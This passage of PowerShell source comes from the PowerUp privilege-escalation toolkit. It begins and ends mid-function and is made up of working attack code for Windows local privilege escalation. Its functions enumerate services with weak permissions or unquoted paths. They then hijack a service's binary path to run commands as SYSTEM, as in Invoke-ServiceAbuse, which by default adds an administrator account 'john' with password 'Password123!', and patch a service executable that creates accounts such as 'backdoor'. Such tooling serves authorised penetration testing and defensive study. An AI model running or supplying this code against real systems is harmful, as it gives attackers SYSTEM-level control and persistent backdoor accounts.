$GetServiceHandle.Invoke($Service, @($ReadControl))\n            $RawHandle\n        }\n    }\n\n    PROCESS {\n        ForEach($ServiceName in $Name) {\n\n            $IndividualService = Get-Service -Name $ServiceName -ErrorAction Stop\n\n            try {\n                Write-Verbose \"Add-ServiceDacl IndividualService : $($IndividualService.Name)\"\n                $ServiceHandle = Get-ServiceReadControlHandle -Service $IndividualService\n            }\n            catch {\n                $ServiceHandle = $Null\n                Write-Verbose \"Error opening up the service handle with read control for $($IndividualService.Name) : $_\"\n            }\n\n            if ($ServiceHandle -and ($ServiceHandle -ne [IntPtr]::Zero)) {\n                $SizeNeeded = 0\n\n                $Result = $Advapi32::QueryServiceObjectSecurity($ServiceHandle, [Security.AccessControl.SecurityInfos]::DiscretionaryAcl, @(), 0, [Ref] $SizeNeeded);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n                # 122 == The data area passed to a system call is too small\n                if ((-not $Result) -and ($LastError -eq 122) -and ($SizeNeeded -gt 0)) {\n                    $BinarySecurityDescriptor = New-Object Byte[]($SizeNeeded)\n\n                    $Result = $Advapi32::QueryServiceObjectSecurity($ServiceHandle, [Security.AccessControl.SecurityInfos]::DiscretionaryAcl, $BinarySecurityDescriptor, $BinarySecurityDescriptor.Count, [Ref] $SizeNeeded);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n                    if (-not $Result) {\n                        Write-Error ([ComponentModel.Win32Exception] $LastError)\n                    }\n                    else {\n                        $RawSecurityDescriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $BinarySecurityDescriptor, 0\n                        $Dacl = $RawSecurityDescriptor.DiscretionaryAcl | ForEach-Object {\n                            Add-Member -InputObject $_ -MemberType NoteProperty -Name AccessRights -Value ($_.AccessMask -as $ServiceAccessRights) -PassThru\n                        }\n                        Add-Member -InputObject $IndividualService -MemberType NoteProperty -Name Dacl -Value $Dacl -PassThru\n                    }\n                }\n                else {\n                    Write-Error ([ComponentModel.Win32Exception] $LastError)\n                }\n                $Null = $Advapi32::CloseServiceHandle($ServiceHandle)\n            }\n        }\n    }\n}\n\n\nfunction Set-ServiceBinaryPath {\n<#\n.SYNOPSIS\n\nSets the binary path for a service to a specified value.\n\nAuthor: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect  \n\n.DESCRIPTION\n\nTakes a service Name or a ServiceProcess.ServiceController on the pipeline and first opens up a\nservice handle to the service with ConfigControl access using the GetServiceHandle\nWin32 API call. ChangeServiceConfig is then used to set the binary path (lpBinaryPathName/binPath)\nto the string value specified by binPath, and the handle is closed off.\n\nTakes one or more ServiceProcess.ServiceController objects on the pipeline and adds a\nDacl field to each object. It does this by opening a handle with ReadControl for the\nservice with using the GetServiceHandle Win32 API call and then uses\nQueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.\n\n.PARAMETER Name\n\nAn array of one or more service names to set the binary path for. Required.\n\n.PARAMETER Path\n\nThe new binary path (lpBinaryPathName) to set for the specified service. Required.\n\n.EXAMPLE\n\nSet-ServiceBinaryPath -Name VulnSvc -Path 'net user john Password123! /add'\n\nSets the binary path for 'VulnSvc' to be a command to add a user.\n\n.EXAMPLE\n\nGet-Service VulnSvc | Set-ServiceBinaryPath -Path 'net user john Password123! /add'\n\nSets the binary path for 'VulnSvc' to be a command to add a user.\n\n.OUTPUTS\n\nSystem.Boolean\n\n$True if configuration succeeds, $False otherwise.\n\n.LINK\n\nhttps://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]\n    [OutputType('System.Boolean')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('ServiceName')]\n        [String[]]\n        [ValidateNotNullOrEmpty()]\n        $Name,\n\n        [Parameter(Position=1, Mandatory = $True)]\n        [Alias('BinaryPath', 'binPath')]\n        [String]\n        [ValidateNotNullOrEmpty()]\n        $Path\n    )\n\n    BEGIN {\n        filter Local:Get-ServiceConfigControlHandle {\n            [OutputType([IntPtr])]\n            Param(\n                [Parameter(Mandatory = $True, ValueFromPipeline = $True)]\n                [ServiceProcess.ServiceController]\n                [ValidateNotNullOrEmpty()]\n                $TargetService\n            )\n            $GetServiceHandle = [ServiceProcess.ServiceController].GetMethod('GetServiceHandle', [Reflection.BindingFlags] 'Instance, NonPublic')\n            $ConfigControl = 0x00000002\n            $RawHandle = $GetServiceHandle.Invoke($TargetService, @($ConfigControl))\n            $RawHandle\n        }\n    }\n\n    PROCESS {\n\n        ForEach($IndividualService in $Name) {\n\n            $TargetService = Get-Service -Name $IndividualService -ErrorAction Stop\n            try {\n                $ServiceHandle = Get-ServiceConfigControlHandle -TargetService $TargetService\n            }\n            catch {\n                $ServiceHandle = $Null\n                Write-Verbose \"Error opening up the service handle with read control for $IndividualService : $_\"\n            }\n\n            if ($ServiceHandle -and ($ServiceHandle -ne [IntPtr]::Zero)) {\n\n                $SERVICE_NO_CHANGE = [UInt32]::MaxValue\n                $Result = $Advapi32::ChangeServiceConfig($ServiceHandle, $SERVICE_NO_CHANGE, $SERVICE_NO_CHANGE, $SERVICE_NO_CHANGE, \"$Path\", [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n                if ($Result -ne 0) {\n                    Write-Verbose \"binPath for $IndividualService successfully set to '$Path'\"\n                    $True\n                }\n                else {\n                    Write-Error ([ComponentModel.Win32Exception] $LastError)\n                    $Null\n                }\n\n                $Null = $Advapi32::CloseServiceHandle($ServiceHandle)\n            }\n        }\n    }\n}\n\n\nfunction Test-ServiceDaclPermission {\n<#\n.SYNOPSIS\n\nTests one or more passed services or service names against a given permission set,\nreturning the service objects where the current user have the specified permissions.\n\nAuthor: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Add-ServiceDacl  \n\n.DESCRIPTION\n\nTakes a service Name or a ServiceProcess.ServiceController on the pipeline, and first adds\na service Dacl to the service object with Add-ServiceDacl. All group SIDs for the current\nuser are enumerated services where the user has some type of permission are filtered. The\nservices are then filtered against a specified set of permissions, and services where the\ncurrent user have the specified permissions are returned.\n\n.PARAMETER Name\n\nAn array of one or more service names to test against the specified permission set.\n\n.PARAMETER Permissions\n\nA manual set of permission to test again. One of:'QueryConfig', 'ChangeConfig', 'QueryStatus',\n'EnumerateDependents', 'Start', 'Stop', 'PauseContinue', 'Interrogate', UserDefinedControl',\n'Delete', 'ReadControl', 'WriteDac', 'WriteOwner', 'Synchronize', 'AccessSystemSecurity',\n'GenericAll', 'GenericExecute', 'GenericWrite', 'GenericRead', 'AllAccess'\n\n.PARAMETER PermissionSet\n\nA pre-defined permission set to test a specified service against. 'ChangeConfig', 'Restart', or 'AllAccess'.\n\n.EXAMPLE\n\nGet-Service | Test-ServiceDaclPermission\n\nReturn all service objects where the current user can modify the service configuration.\n\n.EXAMPLE\n\nGet-Service | Test-ServiceDaclPermission -PermissionSet 'Restart'\n\nReturn all service objects that the current user can restart.\n\n.EXAMPLE\n\nTest-ServiceDaclPermission -Permissions 'Start' -Name 'VulnSVC'\n\nReturn the VulnSVC object if the current user has start permissions.\n\n.OUTPUTS\n\nServiceProcess.ServiceController\n\n.LINK\n\nhttps://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('ServiceProcess.ServiceController')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('ServiceName', 'Service')]\n        [String[]]\n        [ValidateNotNullOrEmpty()]\n        $Name,\n\n        [String[]]\n        [ValidateSet('QueryConfig', 'ChangeConfig', 'QueryStatus', 'EnumerateDependents', 'Start', 'Stop', 'PauseContinue', 'Interrogate', 'UserDefinedControl', 'Delete', 'ReadControl', 'WriteDac', 'WriteOwner', 'Synchronize', 'AccessSystemSecurity', 'GenericAll', 'GenericExecute', 'GenericWrite', 'GenericRead', 'AllAccess')]\n        $Permissions,\n\n        [String]\n        [ValidateSet('ChangeConfig', 'Restart', 'AllAccess')]\n        $PermissionSet = 'ChangeConfig'\n    )\n\n    BEGIN {\n        $AccessMask = @{\n            'QueryConfig'           = [uint32]'0x00000001'\n            'ChangeConfig'          = [uint32]'0x00000002'\n            'QueryStatus'           = [uint32]'0x00000004'\n            'EnumerateDependents'   = [uint32]'0x00000008'\n            'Start'                 = [uint32]'0x00000010'\n            'Stop'                  = [uint32]'0x00000020'\n            'PauseContinue'         = [uint32]'0x00000040'\n            'Interrogate'           = [uint32]'0x00000080'\n            'UserDefinedControl'    = [uint32]'0x00000100'\n            'Delete'                = [uint32]'0x00010000'\n            'ReadControl'           = [uint32]'0x00020000'\n            'WriteDac'              = [uint32]'0x00040000'\n            'WriteOwner'            = [uint32]'0x00080000'\n            'Synchronize'           = [uint32]'0x00100000'\n            'AccessSystemSecurity'  = [uint32]'0x01000000'\n            'GenericAll'            = [uint32]'0x10000000'\n            'GenericExecute'        = [uint32]'0x20000000'\n            'GenericWrite'          = [uint32]'0x40000000'\n            'GenericRead'           = [uint32]'0x80000000'\n            'AllAccess'             = [uint32]'0x000F01FF'\n        }\n\n        $CheckAllPermissionsInSet = $False\n\n        if ($PSBoundParameters['Permissions']) {\n            $TargetPermissions = $Permissions\n        }\n        else {\n            if ($PermissionSet -eq 'ChangeConfig') {\n                $TargetPermissions = @('ChangeConfig', 'WriteDac', 'WriteOwner', 'GenericAll', ' GenericWrite', 'AllAccess')\n            }\n            elseif ($PermissionSet -eq 'Restart') {\n                $TargetPermissions = @('Start', 'Stop')\n                $CheckAllPermissionsInSet = $True # so we check all permissions && style\n            }\n            elseif ($PermissionSet -eq 'AllAccess') {\n                $TargetPermissions = @('GenericAll', 'AllAccess')\n            }\n        }\n    }\n\n    PROCESS {\n\n        ForEach($IndividualService in $Name) {\n\n            $TargetService = $IndividualService | Add-ServiceDacl\n\n            if ($TargetService -and $TargetService.Dacl) {\n\n                # enumerate all group SIDs the current user is a part of\n                $UserIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent()\n                $CurrentUserSids = $UserIdentity.Groups | Select-Object -ExpandProperty Value\n                $CurrentUserSids += $UserIdentity.User.Value\n\n                ForEach($ServiceDacl in $TargetService.Dacl) {\n                    if ($CurrentUserSids -contains $ServiceDacl.SecurityIdentifier) {\n\n                        if ($CheckAllPermissionsInSet) {\n                            $AllMatched = $True\n                            ForEach($TargetPermission in $TargetPermissions) {\n                                # check permissions && style\n                                if (($ServiceDacl.AccessRights -band $AccessMask[$TargetPermission]) -ne $AccessMask[$TargetPermission]) {\n                                    # Write-Verbose \"Current user doesn't have '$TargetPermission' for $($TargetService.Name)\"\n                                    $AllMatched = $False\n                                    break\n                                }\n                            }\n                            if ($AllMatched) {\n                                $TargetService\n                            }\n                        }\n                        else {\n                            ForEach($TargetPermission in $TargetPermissions) {\n                                # check permissions || style\n                                if (($ServiceDacl.AceType -eq 'AccessAllowed') -and ($ServiceDacl.AccessRights -band $AccessMask[$TargetPermission]) -eq $AccessMask[$TargetPermission]) {\n                                    Write-Verbose \"Current user has '$TargetPermission' for $IndividualService\"\n                                    $TargetService\n                                    break\n                                }\n                            }\n                        }\n                    }\n                }\n            }\n            else {\n                Write-Verbose \"Error enumerating the Dacl for service $IndividualService\"\n            }\n        }\n    }\n}\n\n\n########################################################\n#\n# Service enumeration\n#\n########################################################\n\nfunction Get-UnquotedService {\n<#\n.SYNOPSIS\n\nReturns the name and binary path for services with unquoted paths\nthat also have a space in the name.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission  \n\n.DESCRIPTION\n\nUses Get-WmiObject to query all win32_service objects and extract out\nthe binary pathname for each. Then checks if any binary paths have a space\nand aren't quoted.\n\n.EXAMPLE\n\nGet-UnquotedService\n\nGet a set of potentially exploitable services.\n\n.OUTPUTS\n\nPowerUp.UnquotedService\n\n.LINK\n\nhttps://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerUp.UnquotedService')]\n    [CmdletBinding()]\n    Param()\n\n    # find all paths to service .exe's that have a space in the path and aren't quoted\n    $VulnServices = Get-WmiObject -Class win32_service | Where-Object {\n        $_ -and ($Null -ne $_.pathname) -and ($_.pathname.Trim() -ne '') -and (-not $_.pathname.StartsWith(\"`\"\")) -and (-not $_.pathname.StartsWith(\"'\")) -and ($_.pathname.Substring(0, $_.pathname.ToLower().IndexOf('.exe') + 4)) -match '.* .*'\n    }\n\n    if ($VulnServices) {\n        ForEach ($Service in $VulnServices) {\n\n            $SplitPathArray = $Service.pathname.Split(' ')\n            $ConcatPathArray = @()\n            for ($i=0;$i -lt $SplitPathArray.Count; $i++) {\n                        $ConcatPathArray += $SplitPathArray[0..$i] -join ' '\n            }\n\n            $ModifiableFiles = $ConcatPathArray | Get-ModifiablePath\n\n            $ModifiableFiles | Where-Object {$_ -and $_.ModifiablePath -and ($_.ModifiablePath -ne '')} | Foreach-Object {\n                $CanRestart = Test-ServiceDaclPermission -PermissionSet 'Restart' -Name $Service.name\n                $Out = New-Object PSObject\n                $Out | Add-Member Noteproperty 'ServiceName' $Service.name\n                $Out | Add-Member Noteproperty 'Path' $Service.pathname\n                $Out | Add-Member Noteproperty 'ModifiablePath' $_\n                $Out | Add-Member Noteproperty 'StartName' $Service.startname\n                $Out | Add-Member Noteproperty 'AbuseFunction' \"Write-ServiceBinary -Name '$($Service.name)' -Path <HijackPath>\"\n                $Out | Add-Member Noteproperty 'CanRestart' ([Bool]$CanRestart)\n                $Out | Add-Member Aliasproperty Name ServiceName\n                $Out.PSObject.TypeNames.Insert(0, 'PowerUp.UnquotedService')\n                $Out\n            }\n        }\n    }\n}\n\n\nfunction Get-ModifiableServiceFile {\n<#\n.SYNOPSIS\n\nEnumerates all services and returns vulnerable service files.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath  \n\n.DESCRIPTION\n\nEnumerates all services by querying the WMI win32_service class. For each service,\nit takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine\nif the current user has rights to modify the service binary itself or any associated\narguments. If the associated binary (or any configuration files) can be overwritten,\nprivileges may be able to be escalated.\n\n.EXAMPLE\n\nGet-ModifiableServiceFile\n\nGet a set of potentially exploitable service binares/config files.\n\n.OUTPUTS\n\nPowerUp.ModifiablePath\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerUp.ModifiableServiceFile')]\n    [CmdletBinding()]\n    Param()\n\n    Get-WMIObject -Class win32_service | Where-Object {$_ -and $_.pathname} | ForEach-Object {\n\n        $ServiceName = $_.name\n        $ServicePath = $_.pathname\n        $ServiceStartName = $_.startname\n\n        $ServicePath | Get-ModifiablePath | ForEach-Object {\n            $CanRestart = Test-ServiceDaclPermission -PermissionSet 'Restart' -Name $ServiceName\n            $Out = New-Object PSObject\n            $Out | Add-Member Noteproperty 'ServiceName' $ServiceName\n            $Out | Add-Member Noteproperty 'Path' $ServicePath\n            $Out | Add-Member Noteproperty 'ModifiableFile' $_.ModifiablePath\n            $Out | Add-Member Noteproperty 'ModifiableFilePermissions' $_.Permissions\n            $Out | Add-Member Noteproperty 'ModifiableFileIdentityReference' $_.IdentityReference\n            $Out | Add-Member Noteproperty 'StartName' $ServiceStartName\n            $Out | Add-Member Noteproperty 'AbuseFunction' \"Install-ServiceBinary -Name '$ServiceName'\"\n            $Out | Add-Member Noteproperty 'CanRestart' ([Bool]$CanRestart)\n            $Out | Add-Member Aliasproperty Name ServiceName\n            $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ModifiableServiceFile')\n            $Out\n        }\n    }\n}\n\n\nfunction Get-ModifiableService {\n<#\n.SYNOPSIS\n\nEnumerates all services and returns services for which the current user can modify the binPath.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail  \n\n.DESCRIPTION\n\nEnumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if\nthe current user has rights to change the service configuration.\n\n.EXAMPLE\n\nGet-ModifiableService\n\nGet a set of potentially exploitable services.\n\n.OUTPUTS\n\nPowerUp.ModifiablePath\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerUp.ModifiableService')]\n    [CmdletBinding()]\n    Param()\n\n    Get-Service | Test-ServiceDaclPermission -PermissionSet 'ChangeConfig' | ForEach-Object {\n        $ServiceDetails = $_ | Get-ServiceDetail\n        $CanRestart = $_ | Test-ServiceDaclPermission -PermissionSet 'Restart'\n        $Out = New-Object PSObject\n        $Out | Add-Member Noteproperty 'ServiceName' $ServiceDetails.name\n        $Out | Add-Member Noteproperty 'Path' $ServiceDetails.pathname\n        $Out | Add-Member Noteproperty 'StartName' $ServiceDetails.startname\n        $Out | Add-Member Noteproperty 'AbuseFunction' \"Invoke-ServiceAbuse -Name '$($ServiceDetails.name)'\"\n        $Out | Add-Member Noteproperty 'CanRestart' ([Bool]$CanRestart)\n        $Out | Add-Member Aliasproperty Name ServiceName\n        $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ModifiableService')\n        $Out\n    }\n}\n\n\nfunction Get-ServiceDetail {\n<#\n.SYNOPSIS\n\nReturns detailed information about a specified service by querying the\nWMI win32_service class for the specified service name.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nTakes an array of one or more service Names or ServiceProcess.ServiceController objedts on\nthe pipeline object returned by Get-Service, extracts out the service name, queries the\nWMI win32_service class for the specified service for details like binPath, and outputs\neverything.\n\n.PARAMETER Name\n\nAn array of one or more service names to query information for.\n\n.EXAMPLE\n\nGet-ServiceDetail -Name VulnSVC\n\nGets detailed information about the 'VulnSVC' service.\n\n.EXAMPLE\n\nGet-Service VulnSVC | Get-ServiceDetail\n\nGets detailed information about the 'VulnSVC' service.\n\n.OUTPUTS\n\nSystem.Management.ManagementObject\n#>\n\n    [OutputType('PowerUp.ModifiableService')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('ServiceName')]\n        [String[]]\n        [ValidateNotNullOrEmpty()]\n        $Name\n    )\n\n    PROCESS {\n        ForEach($IndividualService in $Name) {\n            $TargetService = Get-Service -Name $IndividualService -ErrorAction Stop\n            if ($TargetService) {\n                Get-WmiObject -Class win32_service -Filter \"Name='$($TargetService.Name)'\" | Where-Object {$_} | ForEach-Object {\n                    try {\n                        $_\n                    }\n                    catch {\n                        Write-Verbose \"Error: $_\"\n                    }\n                }\n            }\n        }\n    }\n}\n\n\n########################################################\n#\n# Service abuse\n#\n########################################################\n\nfunction Invoke-ServiceAbuse {\n<#\n.SYNOPSIS\n\nAbuses a function the current user has configuration rights on in order\nto add a local administrator or execute a custom command.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-ServiceDetail, Set-ServiceBinaryPath  \n\n.DESCRIPTION\n\nTakes a service Name or a ServiceProcess.ServiceController on the pipeline that the current\nuser has configuration modification rights on and executes a series of automated actions to\nexecute commands as SYSTEM. First, the service is enabled if it was set as disabled and the\noriginal service binary path and configuration state are preserved. Then the service is stopped\nand the Set-ServiceBinaryPath function is used to set the binary (binPath) for the service to a\nseries of commands, the service is started, stopped, and the next command is configured. After\ncompletion, the original service configuration is restored and a custom object is returned\nthat captures the service abused and commands run.\n\n.PARAMETER Name\n\nAn array of one or more service names to abuse.\n\n.PARAMETER UserName\n\nThe [domain\\]username to add. If not given, it defaults to \"john\".\nDomain users are not created, only added to the specified localgroup.\n\n.PARAMETER Password\n\nThe password to set for the added user. If not given, it defaults to \"Password123!\"\n\n.PARAMETER LocalGroup\n\nLocal group name to add the user to (default of 'Administrators').\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object specifying the user/password to add.\n\n.PARAMETER Command\n\nCustom command to execute instead of user creation.\n\n.PARAMETER Force\n\nSwitch. Force service stopping, even if other services are dependent.\n\n.EXAMPLE\n\nInvoke-ServiceAbuse -Name VulnSVC\n\nAbuses service 'VulnSVC' to add a localuser \"john\" with password\n\"Password123! to the  machine and local administrator group\n\n.EXAMPLE\n\nGet-Service VulnSVC | Invoke-ServiceAbuse\n\nAbuses service 'VulnSVC' to add a localuser \"john\" with password\n\"Password123! to the  machine and local administrator group\n\n.EXAMPLE\n\nInvoke-ServiceAbuse -Name VulnSVC -UserName \"TESTLAB\\john\"\n\nAbuses service 'VulnSVC' to add a the domain user TESTLAB\\john to the\nlocal adminisrtators group.\n\n.EXAMPLE\n\nInvoke-ServiceAbuse -Name VulnSVC -UserName backdoor -Password password -LocalGroup \"Power Users\"\n\nAbuses service 'VulnSVC' to add a localuser \"backdoor\" with password\n\"password\" to the  machine and local \"Power Users\" group\n\n.EXAMPLE\n\nInvoke-ServiceAbuse -Name VulnSVC -Command \"net ...\"\n\nAbuses service 'VulnSVC' to execute a custom command.\n\n.OUTPUTS\n\nPowerUp.AbusedService\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingUserNameAndPassWordParams', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]\n    [OutputType('PowerUp.AbusedService')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('ServiceName')]\n        [String[]]\n        [ValidateNotNullOrEmpty()]\n        $Name,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $UserName = 'john',\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Password = 'Password123!',\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $LocalGroup = 'Administrators',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [String]\n        [ValidateNotNullOrEmpty()]\n        $Command,\n\n        [Switch]\n        $Force\n    )\n\n    BEGIN {\n\n        if ($PSBoundParameters['Command']) {\n            $ServiceCommands = @($Command)\n        }\n\n        else {\n            if ($PSBoundParameters['Credential']) {\n                $UserNameToAdd = $Credential.UserName\n                $PasswordToAdd = $Credential.GetNetworkCredential().Password\n            }\n            else {\n                $UserNameToAdd = $UserName\n                $PasswordToAdd = $Password\n            }\n\n            if ($UserNameToAdd.Contains('\\')) {\n                # only adding a domain user to the local group, no user creation\n                $ServiceCommands = @(\"net localgroup $LocalGroup $UserNameToAdd /add\")\n            }\n            else {\n                # create a local user and add it to the local specified group\n                $ServiceCommands = @(\"net user $UserNameToAdd $PasswordToAdd /add\", \"net localgroup $LocalGroup $UserNameToAdd /add\")\n            }\n        }\n    }\n\n    PROCESS {\n\n        ForEach($IndividualService in $Name) {\n\n            $TargetService = Get-Service -Name $IndividualService -ErrorAction Stop\n            $ServiceDetails = $TargetService | Get-ServiceDetail\n\n            $RestoreDisabled = $False\n            if ($ServiceDetails.StartMode -match 'Disabled') {\n                Write-Verbose \"Service '$(ServiceDetails.Name)' disabled, enabling...\"\n                $TargetService | Set-Service -StartupType Manual -ErrorAction Stop\n                $RestoreDisabled = $True\n            }\n\n            $OriginalServicePath = $ServiceDetails.PathName\n            $OriginalServiceState = $ServiceDetails.State\n\n            Write-Verbose \"Service '$($TargetService.Name)' original path: '$OriginalServicePath'\"\n            Write-Verbose \"Service '$($TargetService.Name)' original state: '$OriginalServiceState'\"\n\n            ForEach($ServiceCommand in $ServiceCommands) {\n\n                if ($PSBoundParameters['Force']) {\n                    $TargetService | Stop-Service -Force -ErrorAction Stop\n                }\n                else {\n                    $TargetService | Stop-Service -ErrorAction Stop\n                }\n\n                Write-Verbose \"Executing command '$ServiceCommand'\"\n                $Success = $TargetService | Set-ServiceBinaryPath -Path \"$ServiceCommand\"\n\n                if (-not $Success) {\n                    throw \"Error reconfiguring the binary path for $($TargetService.Name)\"\n                }\n\n                $TargetService | Start-Service -ErrorAction SilentlyContinue\n                Start-Sleep -Seconds 2\n            }\n\n            if ($PSBoundParameters['Force']) {\n                $TargetService | Stop-Service -Force -ErrorAction Stop\n            }\n            else {\n                $TargetService | Stop-Service -ErrorAction Stop\n            }\n\n            Write-Verbose \"Restoring original path to service '$($TargetService.Name)'\"\n            Start-Sleep -Seconds 1\n            $Success = $TargetService | Set-ServiceBinaryPath -Path \"$OriginalServicePath\"\n\n            if (-not $Success) {\n                throw \"Error restoring the original binPath for $($TargetService.Name)\"\n            }\n\n            # try to restore the service to whatever the service's original state was\n            if ($RestoreDisabled) {\n                Write-Verbose \"Re-disabling service '$($TargetService.Name)'\"\n                $TargetService | Set-Service -StartupType Disabled -ErrorAction Stop\n            }\n            elseif ($OriginalServiceState -eq \"Paused\") {\n                Write-Verbose \"Starting and then pausing service '$($TargetService.Name)'\"\n                $TargetService | Start-Service\n                Start-Sleep -Seconds 1\n                $TargetService | Set-Service -Status Paused -ErrorAction Stop\n            }\n            elseif ($OriginalServiceState -eq \"Stopped\") {\n                Write-Verbose \"Leaving service '$($TargetService.Name)' in stopped state\"\n            }\n            else {\n                Write-Verbose \"Restarting '$($TargetService.Name)'\"\n                $TargetService | Start-Service\n            }\n\n            $Out = New-Object PSObject\n            $Out | Add-Member Noteproperty 'ServiceAbused' $TargetService.Name\n            $Out | Add-Member Noteproperty 'Command' $($ServiceCommands -join ' && ')\n            $Out.PSObject.TypeNames.Insert(0, 'PowerUp.AbusedService')\n            $Out\n        }\n    }\n}\n\n\nfunction Write-ServiceBinary {\n<#\n.SYNOPSIS\n\nPatches in the specified command to a pre-compiled C# service executable and\nwrites the binary out to the specified ServicePath location.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nTakes a pre-compiled C# service binary and patches in the appropriate commands needed\nfor service abuse. If a -UserName/-Password or -Credential is specified, the command\npatched in creates a local user and adds them to the specified -LocalGroup, otherwise\nthe specified -Command is patched in. The binary is then written out to the specified\n-ServicePath. Either -Name must be specified for the service, or a proper object from\nGet-Service must be passed on the pipeline in order to patch in the appropriate service\nname the binary will be running under.\n\n.PARAMETER Name\n\nThe service name the EXE will be running under.\n\n.PARAMETER UserName\n\nThe [domain\\]username to add. If not given, it defaults to \"john\".\nDomain users are not created, only added to the specified localgroup.\n\n.PARAMETER Password\n\nThe password to set for the added user. If not given, it defaults to \"Password123!\"\n\n.PARAMETER LocalGroup\n\nLocal group name to add the user to (default of 'Administrators').\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object specifying the user/password to add.\n\n.PARAMETER Command\n\nCustom command to execute instead of user creation.\n\n.PARAMETER Path\n\nPath to write the binary out to, defaults to 'service.exe' in the local directory.\n\n.EXAMPLE\n\nWrite-ServiceBinary -Name VulnSVC\n\nWrites a service binary to service.exe in the local directory for VulnSVC that\nadds a local Administrator (john/Password123!).\n\n.EXAMPLE\n\nGet-Service VulnSVC | Write-ServiceBinary\n\nWrites a service binary to service.exe in the local directory for VulnSVC that\nadds a local Administrator (john/Password123!).\n\n.EXAMPLE\n\nWrite-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\\john'\n\nWrites a service binary to service.exe in the local directory for VulnSVC that adds\nTESTLAB\\john to the Administrators local group.\n\n.EXAMPLE\n\nWrite-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!\n\nWrites a service binary to service.exe in the local directory for VulnSVC that\nadds a local Administrator (backdoor/Password123!).\n\n.EXAMPLE\n\nWrite-ServiceBinary -Name VulnSVC -Command \"net ...\"\n\nWrites a service binary to service.exe in the local directory for VulnSVC that\nexecutes a custom command.\n\n.OUTPUTS\n\nPowerUp.ServiceBinary\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingUserNameAndPassWordParams', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]\n    [OutputType('PowerUp.ServiceBinary')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('ServiceName')]\n        [String]\n        [ValidateNotNullOrEmpty()]\n        $Name,\n\n        [String]\n        $UserName = 'john',\n\n        [String]\n        $Password = 'Password123!',\n\n        [String]\n        $LocalGroup = 'Administrators',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [String]\n        [ValidateNotNullOrEmpty()]\n        $Command,\n\n        [String]\n        $Path = 